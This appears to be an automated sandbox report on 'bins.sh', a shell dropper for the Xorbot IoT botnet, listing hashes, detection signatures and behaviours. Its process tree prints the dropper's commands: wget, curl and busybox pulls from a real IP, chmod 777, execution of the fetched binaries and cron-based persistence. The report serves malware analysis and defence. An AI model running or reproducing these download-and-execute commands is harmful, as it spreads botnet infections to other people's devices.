Analysis

  • max time kernel
    149s
  • max time network
    158s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    04-12-2024 08:55

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    ef3b5b8d03ad9b64895750001a9a9f81

  • SHA1

    67905e0b7ab0f9251c5591a53ab0efbfbe4aba7e

  • SHA256

    cd567b9f3db24e8d535579d9dc2205d9730046834635074acae74277fe2460de

  • SHA512

    d3430b5354703e133e906aa7f15d186f6c5d79914f465decabb603b16269e41a7ee63647e3209ecd66c7fd619266a50b6de934825d1cbc9becc66c20398c529f

  • SSDEEP

    96:LVc68OcK8INtzVZ7Tjl9P3/Mwyq+zVc68OcK8INuFS0AVhX7DE7PneP3/Mw0q+s+:LxzVZvjl9P3/MwyjVc2P3/Mw6

Malware Config

Signatures

  • Detects Xorbot 2 IoCs
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 2 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:658
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:662
        • /usr/bin/wget
          wget http://216.126.231.240/bins/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj
          2⤵
          • Writes file to tmp directory
          PID:665
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • Writes file to tmp directory
          PID:680
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj
          2⤵
          • Writes file to tmp directory
          PID:687
        • /bin/chmod
          chmod 777 OXVxT5hUBFD9egbouowK0UOvExtshC3jGj
          2⤵
          • File and Directory Permissions Modification
          PID:689
        • /tmp/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj
          ./OXVxT5hUBFD9egbouowK0UOvExtshC3jGj
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:690
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:692
              • /usr/bin/crontab
                crontab -l
                4⤵
                  PID:693
              • /bin/sh
                sh -c "crontab -"
                3⤵
                  PID:694
                  • /usr/bin/crontab
                    crontab -
                    4⤵
                    • Creates/modifies Cron job
                    • Reads runtime system information
                    PID:695
              • /bin/rm
                rm OXVxT5hUBFD9egbouowK0UOvExtshC3jGj
                2⤵
                  PID:697
                • /usr/bin/wget
                  wget http://216.126.231.240/bins/YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6
                  2⤵
                    PID:700
                  • /usr/bin/curl
                    curl -O http://216.126.231.240/bins/YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6
                    2⤵
                      PID:701
                    • /bin/busybox
                      /bin/busybox wget http://216.126.231.240/bins/YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6
                      2⤵
                      • Writes file to tmp directory
                      PID:702
                    • /bin/chmod
                      chmod 777 YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6
                      2⤵
                      • File and Directory Permissions Modification
                      PID:703
                    • /tmp/YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6
                      ./YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6
                      2⤵
                      • Executes dropped EXE
                      PID:706
                    • /bin/rm
                      rm YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6
                      2⤵
                        PID:708
                      • /usr/bin/wget
                        wget http://216.126.231.240/bins/a0wubK2TzV0i7LK0iHvF93vpMmsRUZHzE9
                        2⤵
                          PID:709

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • /tmp/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj

                        Filesize

                        119KB

                        MD5

                        1b166b95f9cb4b079ef1b9ec8363ddf3

                        SHA1

                        0d8eb08add467b3b5474f9b25909297fe7c2839c

                        SHA256

                        94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

                        SHA512

                        983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

                      • /tmp/YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6

                        Filesize

                        112KB

                        MD5

                        05d7857dcead18bbd86d2935f591873c

                        SHA1

                        34d18f41ef35f93d5364ce3e24d74730a4e91985

                        SHA256

                        2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70

                        SHA512

                        d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

                      • /var/spool/cron/crontabs/tmp.7yAWuu

                        Filesize

                        210B

                        MD5

                        bbbc4f15a2c110ddc72656ce1f4d9609

                        SHA1

                        8bafc9e8b75f9d98e7cbf8993ef8f9532c7410b5

                        SHA256

                        6e92c9008fc5f4bd4db14914fe85c82feef5abce992396640a4cea621b2bd5e7

                        SHA512

                        7f3af90986bb977bca6471e54a4b97e7ec9a06e6b5212bda65cae59aac8512475dfb1c65cb0e3c53a83c6b18e880f8c793a8b08871a998239c149b0d1d97a1c6